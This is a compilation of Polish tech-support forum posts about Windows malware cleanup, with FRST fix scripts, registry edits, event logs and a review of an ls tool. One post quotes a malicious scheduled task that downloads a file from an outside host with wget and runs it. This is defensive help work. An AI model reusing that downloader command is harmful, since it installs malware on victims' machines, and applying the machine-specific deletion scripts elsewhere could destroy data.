picasso

Copyright @picasso fixitpc.pl Powielanie tej pracy zabronione. Spis treści: KpRm - Usunięcie używanych narzędzi (zastępuje stary DelFix) Czyszczenie folderów Przywracania systemu Aktualizacje Windows Aktualizacje innych programów Java - dodatkowe kroki Migracja ze starszych systemów na Windows 11 Lista darmowych i komercyjnych programów zabezpieczających

Na początek, nie podałeś obowiązkowych raportów z FRST. Ocena tylko USBFix to za mało i w ogóle nie pozwala na określenie czy jest jakaś infekcja aktywna w systemie (a nie tylko na urządzeniu). I proszę o nieumieszczanie logów na wklejto, ten serwis przekodowuje specjalne znaki i psuje specjalne rekordy w logach. Raporty umieśc w postaci oryginalnych plików, czyli jako załączniki forum. Te zachowania są związane z ustawieniami polityk urządzenia. Komputer > prawy klik na dysk > Właściwości > karta Sprzęt > podświetl urządzenie i Właściwości > klik w Zmień ustawienia (potwierdz dialog UAC) > pojawi się karta Zasady > powinna byc zaznaczona pierwsza opcja: Folder "msdownld.tmp" jest kojarzony z aktualizacjami Internet Explorer (KB296273). Aktualizacje Windows tworzą foldery tymczasowe na dyskach z obliczoną największą ilością wolnego miejsca, dlatego tez często lądują na innych dyskach niz C, w tym nawet przenośnych. I on się nie pojawił co dopiero, był na urządzeniu dłuzszy czas, tylko prawdopodobnie teraz masz włączone pokazywanie ukrytych folderów. Folder ma stary znacznik czasowy. Ponadto, jest powielony i na drugim dysku. [01/04/2013 - 19:52:40 | HD] - D:\msdownld.tmp [01/01/2013 - 16:41:50 | HD] - G:\msdownld.tmp Jeśli jakieś dane zniknęły, to prędzej na skutek akcji z przepinaniem urządzenia i jakiś błędów. Mogą by uszkodzenia struktury plików, jak np. w w tym temacie. Rozpocznij od: 1. Rekonfiguracji polityk urządzenia, jak podałam powyzej. 2. Skanu dysku pod kątem błędów. Prawoklik na dysk > Właściwości > Narzędzia > Sprawdzanie błędów.

Na wszelki wypadek podaj aktualny wygląd w/w kluczy, czy edycja w ogóle się zapisała, oraz dodatkowy wyciąg z kluczy 32-bit. Czyli do Notatnika wklej: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Plik zapisz pod nazwą fixlist.txt obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Prawdopodobną przyczyną problemu jest ten drugi wariant, który wspominałam, czyli: "niestandardowy mechanizm poświadczeń logowania wprowadzony przez zewnętrzny program". W systemie siedzi niedomyślny dostawca logowania Qualcomm Atheros: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B} (Default) REG_SZ AthCredentialProvider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B} (Default) REG_SZ AthCredentialProvider Sprawdź czy "Inny użytkownik" zniknie po wykluczeniu tego dostawcy z mechanizmu logowania: 1. Otwórz Notatnik i wklej w nim: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B}] "Disabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B}] "Disabled"=dword:00000001 Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru. 2. Zresetuj system. Podaj czy "Inny użytkownik" zniknął.

Glazur, proszę nie podbijaj tematu takimi postami, usunęłam ten śmietnik. Jestem nieobecna (wyjazd świąteczny, a teraz po powrocie mam trochę rzeczy osobistych na głowie), odpowiadam gdy jestem w stanie się zająć tematem. A nikt inny nie udziela odpowiedzi prawdopodobnie ze względu na nieprzeczytanie wątku lub niezrozumienie podanych danych. Na szybko: Z tego co rozumiem widzicie tylko jedno konto w Panelu sterowania, FRST wykrywa jednak dwa aktywne konta, a załadowanym jest USER: Potwierdź, że konto Limitowane "Kasia" jest niewidoczne w Panelu sterowania.

Najlepsze życzenia z okazji Świąt Bożego Narodzenia dla wszystkich użytkowników fixitpc.pl! Dużo zdrowia, radości, obfitych "łupów" pod choinką.

Temat przenoszę do działu Windows. Nie widzę tu żadnych oznak infekcji, ale powierdź mi, że poniższy BAT w starcie to Twoja robota: Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\statarp.bat [2015-12-17] () Z raportów nic nie wynika i nie widać błędów pasujących do opisywanych zjawisk. Do rozwiązania są natomiast te zgłoszenia z Dziennika, przy czym ten z "Odmową dostępu" na razie pomijam (to może być wynik aktywności COMODO): Dziennik Aplikacja: ================== Error: (12/21/2015 07:37:12 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (12/21/2015 06:21:06 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas wywoływania procedury RegSetValueExW(0x0000035c,(null),0,REG_BINARY,000000000310EBB0.72). hr = 0x80070005, Odmowa dostępu. Dziennik System: ============= Error: (12/21/2015 07:35:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi OpenERP Server 7.0 z powodu następującego błędu: %%2 Error: (12/21/2015 07:23:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi atksgt z powodu następującego błędu: %%1275 Error: (12/21/2015 07:23:33 PM) (Source: Application Popup) (EventID: 875) (User: ) Description: Sterownik atksgt.sys został zablokowany dla ładowania. Error: (12/21/2015 07:21:29 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} Error: (12/21/2015 06:21:54 PM) (Source: sptd) (EventID: 4) (User: ) Description: Sterownik wykrył błąd wewnętrzny w swoich strukturach danych dla . Error: (12/21/2015 05:17:00 PM) (Source: Application Popup) (EventID: 1060) (User: ) Description: Ładowanie sterownika \SystemRoot\System32\DRIVERS\PSKMAD.sys zostało zablokowane z powodu niezgodności z tym systemem. Skontaktuj się z dostawcą oprogramowania w celu uzyskania zgodnej wersji sterownika. 1. Błąd WMI zlikwiduje narzędzie Fix-it: KLIK. 2. Sterownik SPTD "wykrywający błąd wewnętrzny w swoich strukturach" odinstalujesz za pomoc narzędzia SPTDinst: KLIK. Nie ma żadnych programów widocznych które z niego korzystają (Alcohol, DAEMON). 3. Parę sterowników atksgt.sys + lirsgt.sys (zabezpieczenie Tages) odinstalujesz posługując się paczką instalacyjną Tages: KLIK. 4. Resztę błędów z sekcji "System" załatwi poniższy skrypt, który adresuje też wpisy odpadkowe i Tempy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: FF SearchEngineOrder.1: Ask.com SearchScopes: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> {23AD979E-AD0A-4E0A-9E1E-F7247FB94DEB} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=FF&o=14594&src=kw&q={searchTerms}&locale=&apn_ptnrs=^FV&apn_dtid=^YYYYYY^YY^PL&apn_uid=2bb6ad41-8d91-4057-a490-2d3dfb192983&apn_sauid=A1DEE445-736E-4216-99DA-11F8667B96BF SearchScopes: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear HKU\S-1-5-21-1647462393-2480976863-1240803015-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie HKU\S-1-5-21-1647462393-2480976863-1240803015-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie Toolbar: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin HKU\.DEFAULT: @tracker-software.com/PDF-XChange Editor Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Editor\npPDFXEditPlugin.x64.dll [brak pliku] Task: {58AEA187-00CB-497B-AA5C-F98943D6DF1A} - System32\Tasks\{27D47E0A-080E-4506-A8AB-79424E902BB6} => pcalua.exe -a "D:\Gry\Gra-Wiedzmin.ER.PL\Patch\Patch 1.4 - Edycja Rozszerzona\setup.exe" -d "D:\Gry\Gra-Wiedzmin.ER.PL\Patch\Patch 1.4 - Edycja Rozszerzona" Task: {BB2605DC-C317-4BEF-8D68-291CD0CDE98B} - System32\Tasks\{8FDFA698-384C-4211-B938-7953D80E44C4} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/pl/abandoninstall?page=tsProgressBar Task: {BC516846-0B69-4362-BA33-7EB70DED58DF} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: {DCFCE7D9-4AC7-46F8-B9D5-1302C4142F30} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe Task: C:\windows\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe GroupPolicyUsers\S-1-5-21-1647462393-2480976863-1240803015-1003\User: Ograniczenia S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [50320 2015-01-29] (Panda Security, S.L.) S2 openerp-server-7.0; "C:\Program Files (x86)\OpenERP 7.0-20140105-002500\Server\service\OpenERPServerService.exe" [X] S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X] S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X] DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ProgramData\Kaspersky Lab Setup Files C:\Users\Ruka\AppData\Local\70149b02515b3bb20dd492.47983420 C:\Windows\System32\Drivers\PSKMAD.sys EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST, i FRST nie może działać w piaskownicy (widoczny znak to zielona obwódka wokół okna). Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart. Przedstaw wynikowy fixlog.txt. A puste skróty z kopii Pulpitu to już samodzielnie posprzątaj: C:\Users\Ruka\Desktop\pen_k\Pulpit C:\Users\Ruka\Desktop\pen_k\Nowy folder\Pulpit Skoro na innym urządzeniu, czyli telefonie, występuje to samo, to problem nie leży po stronie widzianego Windows. Nasuwają się ustawienia DNS pobierane z routera. Mógłbyś przetestować czy sprawa ulegnie zmianie, jeśli w routerze tymczasowo ustawisz np. serwery Google: 8.8.8.8 + 8.8.4.4.

Wszystko gładko zrobione. Ostatnia mini-poprawka. Otwórz Notatnik i wklej w nim: DeleteKey: HKLM\SOFTWARE\yoursites123Software RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Anka\Desktop\Stare dane programu Firefox CMD: type C:\Users\Anka\AppData\Roaming\Mozilla\Firefox\Profiles\k2gzr1ao.default-1450731490851\user.js CMD: del /q C:\Users\Anka\AppData\Roaming\Mozilla\Firefox\Profiles\k2gzr1ao.default-1450731490851\user.js CMD: del /q C:\Users\Anka\Downloads\aspsetup.exe CMD: del /q C:\Users\Anka\Downloads\qtokx0wv.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. PS. Widzę Free Zip Opener + WinRAR. Polecam zamiast tych dwóch programów darmowy 7-zip.

O co chodzi z tą wzmianką o poście? A log Addition był urwany, więc albo to jest log który skopiowałeś gdy FRST jeszcze skanował, albo był jakiś błąd podczas skanu. Ale to nie jest aż tak istotne, ten spód raportu nie wnosi nic nowego do sprawy.

Trochę dziwnie wygląda ta instalacja Java, tzn. nie widzę wtyczek Java w Firefox i IE, pomimo że potwierdzasz sprawność z poziomu banku - czy to jest może log FRST robiony, gdy instalacja Java była jeszcze w toku? A poza tym wszystko wygląda czysto i prawie kończymy: 1. Nadal widzę ten ukryty odpadek RealUpgrade 1.1 na liście Dodaj/Usuń - czy była jakaś trudność w wykonaniu poniższego zadania? 2. Ostatni skrypt do FRST usuwający odpadkowe katalogi kont z dysku i czyszczący lokalizacje tymczasowe. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Documents and Settings\Ania RemoveDirectory: C:\Documents and Settings\Anusia RemoveDirectory: C:\Documents and Settings\Kasia Rymarska\Dane aplikacji\Yahoo! RemoveDirectory: C:\Documents and Settings\Kasia Rymarska\Dane aplikacji\Mozilla\Firefox\Profiles\6v6vtl33.default RemoveDirectory: C:\FRST\Quarantine EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt.

"Obok" = w tym samym folderze gdzie siedzi FRST.

Ten objaw produkuje jedno z dwóch: uszkodzone identyfikatory kont w rejestrze (KLIK) lub niestandardowy mechanizm poświadczeń logowania wprowadzony przez zewnętrzny program (KLIK). Poproszę o podobne dane jak w przypadku w/w tematów, tzn.: 1. Zrób raporty FRST. Dadzą ogólne pojęcie co się uruchamia + w Addition będzie wyciąg kont z identyfikatorami SID. 2. Do Notatnika wklej: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Brakuje pliku fixlog.txt z wynikami usuwania. Plik jest tam skąd uruchamiałeś FRST.

Ja nadal twierdzę, że określone problemy tworzy McAfee. I nie widać żadnych zmian. Jak były usługi i sterowniki McAfee, tak są nadal: ==================== Usługi (filtrowane) ======================== R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-11-10] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S4 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-07-31] (McAfee, Inc.) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [376264 2015-08-10] (McAfee, Inc.) S4 mfevtp; C:\Windows\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.) ===================== Sterowniki (filtrowane) ========================== S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [80768 2015-08-10] (McAfee, Inc.) R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [413432 2015-08-10] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349096 2015-08-10] (McAfee, Inc.) R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [495856 2015-08-10] (McAfee, Inc.) R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [839376 2015-08-10] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.) Ale w FRST Addition nie ma żadnych zmian. Przypuszczalnie McAfee zablokował zmiany. W związku z powyższym spróbuj usługi + sterowniki McAfee wyłączyć z poziomu środowiska zewnętrznego RE, a dopiero po tym ponowić operację deinstalacji. Czyli: 1. Otwórz Notatnik i wklej: DisableService: cfwids DisableService: HomeNetSvc DisableService: McAPExe DisableService: mcpltsvc DisableService: McProxy DisableService: mfeaack DisableService: mfeavfk DisableService: mfefirek DisableService: mfehidk DisableService: mfemms DisableService: mfewfpk Plik zapisz pod nazwą fixlist.txt. Plik ten musi być tam skąd będzie uruchamiany FRST w punkcie 2. 2. F8 > Napraw komputer > Wiersz polecenia > uruchom FRST zgodnie ze wskazówkami: KLIK. Klik w Napraw (Fix). Tam skąd był uruchamiany FRST powstanie fixlog.txt. 3. Restart z powrotem do Windows i powtarzasz to wszystko: + pokaż też fixlog.txt.

W systemie była aktywna infekcja w Harmonogramie zadań, pominięta w pierwotnych instrukcjach. Konkretnie BitCoinMiner (wpis MdmUpdateTaskMachineCore) oraz VBKlip/Banatrix (logger): Task: {5E3A314B-DAC0-417E-9379-C49049DA4729} - System32\Tasks\MdmUpdateTaskMachineCore => C:\Users\Timi\AppData\Roaming\uTorrent\Caches\mdm [2015-05-10] ( ) Task: {B3CB3E0B-E2CB-407C-AFDB-17C76C4DD8E7} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=VrNyEGncEc;ALLPlayer_Premium_5.6.2_Setup.exe;1426426470 & start cmd /R dat.bmp Upłynęło dużo czasu. Jeśli nadal problem aktualny, dostarcz świeże raporty FRST, wliczając Addition.

Temat przenoszę do działu Windows. Nic podejrzanego w raportach. Stare odpadkowe zadania używane przez jakiś instalator uruchamiany z płyty. Jest mnóstwo instalatorów, które zostawiają podobne ślady. Odpadkowe, gdyż brak dysku E. - WMP używany czy nie, i tak działa usługa współdzielenia multimediów w sieci domowej. Usługę możesz wyłączyć. - "Windows Start-Up Application" czyli systemowy wininit.exe. Nie ma tu za dużo detali na obrazku i nie wiem czego to pochodna. Proces wininit.exe inicjuje całą strukturę procesów, w obrębie której mógł być jakiś inny program. Czyli tylko akcje "kosmetyczne": 1. Do wywalenia para Adobe Flash Player 10 Plugin + Gadu-Gadu 10. To stare Gadu będzie w kółko reinstalować niebezpieczną wersję Flash (aktualnie używa jej też Firefox), bo potrzebuje jej do wyświetlania reklam, niezależnie od tego że te reklamy się czymś "wytnie". W zamian GG12 + najnowszy Adobe Flash NPAPI linkowany w przyklejonym: KLIK. 2. W kwestii błędów z Dziennika: Dziennik System: ============= Error: (11/20/2015 02:44:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa buforowania czcionek platformy Windows Presentation Foundation, wersja 3.0.0.0 z powodu następującego błędu: %%1053 Error: (11/20/2015 02:44:26 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Usługa buforowania czcionek platformy Windows Presentation Foundation, wersja 3.0.0.0. Zobacz tu: KLIK. Dziennik Aplikacja: ================== Error: (12/21/2015 10:34:03 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Zastosuj narzędzie Fix-it: KLIK. 3. Drobny skrypt do FRST usuwający wpisy puste: CloseProcesses: CreateRestorePoint: Task: {8C5340CE-1B7C-4A37-95E0-20E0AA729BD4} - System32\Tasks\{73AB7E02-787E-483A-98A3-0DE5BC130027} => E:\SETUP.EXE Task: {9B8D6073-3E12-4C34-8117-F57F6BAE2F90} - System32\Tasks\{A7D70721-58AB-4D0D-A096-527B7A9ACE95} => E:\SETUP.EXE Task: {B75953AF-CD43-430D-94B0-32E8A15616AB} - System32\Tasks\{88DB7233-50A8-4EB7-B294-DC4C322061C0} => E:\SETUP.EXE HKU\S-1-5-19\...\Run: [sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun HKU\S-1-5-20\...\Run: [sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [brak pliku] DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 CMD: netsh advfirewall reset EmptyTemp:

Twoją domyślną przeglądarką jest Firefox, który już domyślnie ustawia wtyczki Java w stanie "click-to-play" i będziesz potwierdzać jak poprzednio. I jeszcze ostrzeżenie: do końca roku 2016 dla bezpieczeństwa zostanie całkowicie usunięta obsługa wtyczk NPAPI (czyli i Java) w Firefox, nie będzie już możliwa instalacja żadnej wersji Java, nawet najnowszej. Czyli jedyna przeglądarka która Ci zostanie do obsługi tego banku (o ile nie zaktualizują metody) to stary Internet Explorer lub ewentualnie instalacja Opery (nie wiadomo jednak czy obsługa NPAPI się utrzyma do tego czasu)...

W żadnym wypadku nie pobierać z Softonic, czym to grozi: KLIK. W przyklejonym temacie pierwszy link oracle.com podaje na spodzie link do archiwum Java. Interesuje Cię Java SE Runtime Environment 7u80 - Windows x86 Offline (jre-7u80-windows-i586.exe): KLIK. Miej na uwadze, że jest to niezabezpieczona i niewspierana wersja.

GNU ls for Microsoft Windows Strona domowa Platforma: Windows 9x do Windows 10 32-bit i 64-bit Licencja: GNU General Public License (GPL) Narzędzie ls / msls dla Windows to klon Uniksowego LS i rozbudowana alternatywa dla systemowego narzędzia DIR. Uwzględnia wszystko co nie jest dostępne w podstawowym odczycie DIR: ukryte strumienie NTFS, Hard linki / punkty połączeń NTFS, skróty, uprawnienia dostępu DACLs/SACLs, szyfrowanie, kompresowanie NTFS, poziomy integralności, status offline. Potrafi też listować zawartość kluczy rejestru. Możliwe jest kolorowanie listingu wg typu obiektów, domyślnie kolorowanie nie jest włączone (przyglądnąć się na parametr --color), a także można przekonfigurować presety za pomocą dołączonego do zestawu narzędzia dircolors. Listę można sortować, również wg wielkości liternictwa (parametr --sort=case), mimo że sama platforma Windows nie jest case-sensitive. Także egzekwować inne ustawienia formatowania wyświetlania. Co ważne: narzędzie jest kompatybilne z systemem przekierowań na platformach 64-bit, tzn. widzi prawidłową zawartość katalogu system32 a nie SysWOW64 (parametry --32 i --64), oraz z techniką wirtualizacji plików i rejestru na systemach Vista i nowszych (parametr --virtual). Lista poleceń jest bardzo bogata, kompletny zestaw obejrzycie przez wprowadzenie polecenia ls --help. Do przejrzenia pełna dokumentacja narzędzia. W paczce zostało załączone też narzędzie grep w wersji dla Windows. Bardzo fajny alternatywny DIR, tylko trzeba się przyzwyczaić do unixowatego typu przełączników. D:\Download\msls310>ls --help Usage: ls [OPTION]... [FILE]... List information about the FILEs (the current directory by default). ls version 4.5.310 2015/12 for Microsoft Windows. Microsoft Windows extensions by Alan Klietz Get the latest version at https://u-tools.com/msls.asp -a, --all do not hide entries starting with . -A, --almost-all do not list implied . and .. --acls[=STYLE] show the file Access Control Lists (ACL): STYLE may be `none', `short', `long', `very-long', or `exhaustive' --ansi-cp use the ANSI code page for output -b, --escape print octal escapes for nongraphic characters --block-size=SIZE use SIZE-byte blocks. See -s -B, --ignore-backups do not list implied entries ending with ~ -c with -lt: sort by, and show, ctime (time of file creation instead of modification) with -l: show ctime and sort by name otherwise: sort by ctime -C list entries by columns --color[=WHEN] control whether color is used to distinguish file types. WHEN may be `never', `always', or `auto' --compressed indicate compressed files with distinct color (requires --color) -d, --directory list directory entries instead of contents -D, --dired generate output designed for Emacs' dired mode --encryption-users show names of users with encryption keys for file -f do not sort, enable -aU, disable -lst -F, --classify append indicator (one of *\@$) to entries --fast do not get extended information from slow media such as networks, diskettes, or CD-ROMs --format=WORD across -x, commas -m, horizontal -x, long -l, single-column -1, verbose -l, vertical -C --full-time list both full date and full time -g, --groups[=y/n] show POSIX group information -G do not show POSIX group information --gids[=STYLE] show POSIX group security identifiers: STYLE may be `long', `short', or `none' -h, -H, --human-readable print sizes in human readable format (1K 234M 2G) --si likewise, but use powers of 1000 not 1024 -i, --inode print index number of each file -I, --ignore=PATTERN do not list implied entries matching shell PATTERN --indicator-style=WORD append indicator with style WORD to entry names: none (default), classify (-F), file-type (-p) -k, --kilobytes like --block-size=1024 -K, --registry show registry keys: hklm, hkcu, hku, hkcr -l use a long listing format -L, --dereference list entries pointed to by symbolic links -m fill width with a comma separated list of entries -M, --more Pause output to the console between each screenful -n, --numeric-uid-gid list numeric UIDs and GIDs instead of names and show Security Identifiers (SIDs) in raw form -N, --literal print raw entry names (don't treat e.g. control characters specially) -o use long listing format without POSIX group info --object-id show the object ID for the file (if any) --oem-cp use the OEM code page for output -p, --file-type append indicator (one of \@$) to entries --phys-size report the physical size if the file is compressed or sparse -q, --hide-control-chars print ? instead of non graphic characters --show-control-chars show non graphic characters as-is (default unless program is `ls' and output is a terminal) -Q, --quote-name enclose entry names in double quotes --quoting-style=WORD use quoting style WORD for entry names: literal, locale, shell, shell-always, c, escape -r, --reverse reverse order while sorting -R, --recursive list subdirectories recursively --recent[=#] highlight files changed in the last # minutes using a distinctive color --short-names show short 8.3 letter file names, a la MS-DOS --sids[=STYLE] show file owner Security Identifiers (SIDs): STYLE may be `long', `short', or `none'. See -n -s, --size print size of each file in blocks -S sort by file size --slow get extended information from slow media such as networks, diskettes, or CD-ROMs (see --fast) --sort=WORD sort by: none -U, size -S, time -t, version -v, extension -X, case status -c, time -t, atime -u, access -u, use -u --streams[=y/n] report files containing streams (-F -p --color) with -l: print the names of the streams --time=WORD show time as WORD instead of modification time: atime, access, use, or ctime (creation time) specified time is sort key if --sort=time --time-style=STYLE with -l, show times using style STYLE: full-iso, long-iso, iso, +FORMAT. FORMAT is based on strftime; if FORMAT is FORMAT1!FORMAT2, FORMAT1 applies to non-recent files and FORMAT2 to recent files -t sort by modification time -T, --tabsize=COLS assume tab stops at each COLS instead of 8 --token show the process token -u with -lt: sort by, and show, access time with -l: show access time and sort by name otherwise: sort by access time -U do not sort; list entries in directory order --user=NAME report permissions from the viewpoint of user NAME -v sort by version --view-security view the file's security, a la Windows Explorer --virtual show the virtual view of files and the registry as seen by pre-Vista legacy applications -w, --width=COLS assume screen width instead of current value -x list entries by lines instead of by columns -X sort alphabetically by entry extension -1 list one file per line --32 show 32-bit view of files and the registry --64 show 64-bit view of files and the registry (default is --64 on 64-bit operating systems) --help display this help and exit --version output version information and exit By default, color is not used to distinguish types of files. This is equivalent to using --color=none. Using the --color option without an argument is equivalent to --color=always. When using --color=auto, color codes are generated only if the output is a display console. Use the environment variable LS_OPTIONS to set default options. Example: -bhAC --more --color=auto --recent --streams D:\Download\msls310>

Zacznij od deinstalacji starych wersji, ASUSowych zbędników oraz Avast (najnowsza wersja to 11.1.2245): ==================== Zainstalowane programy ====================== „Windows Live Mesh ActiveX“ nuotolinių ryšių valdiklis (HKLM-x32\...\{9024FE65-46B8-4C8A-9D98-8DCB6BD5F598}) (Version: 15.4.5722.2 - Microsoft Corporation) ActiveX контрола на Windows Live Mesh за отдалечени връзки (HKLM-x32\...\{B3BA4D1C-23EF-4859-9C11-1B2CCB7FADBB}) (Version: 15.4.5722.2 - Microsoft Corporation) Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.194 - Adobe Systems Incorporated) ASUS WebStorage (HKLM-x32\...\ASUS WebStorage) (Version: 3.0.108.222 - eCareme Technologies, Inc.) AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.7.142 - ASUSTEK) Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software) Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation) Control ActiveX Windows Live Mesh pentru conexiuni la distanță (HKLM-x32\...\{260E3D78-94E6-47EC-8E29-46301572BB1E}) (Version: 15.4.5722.2 - Microsoft Corporation) CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3624 - CyberLink Corp.) CyberLink Media Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2926 - CyberLink Corp.) CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 7.0.0.1126 - CyberLink Corp.) Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.10 - ASUS) Formant ActiveX programu Windows Live Mesh odpowiedzialny za obsługę połączeń zdalnych 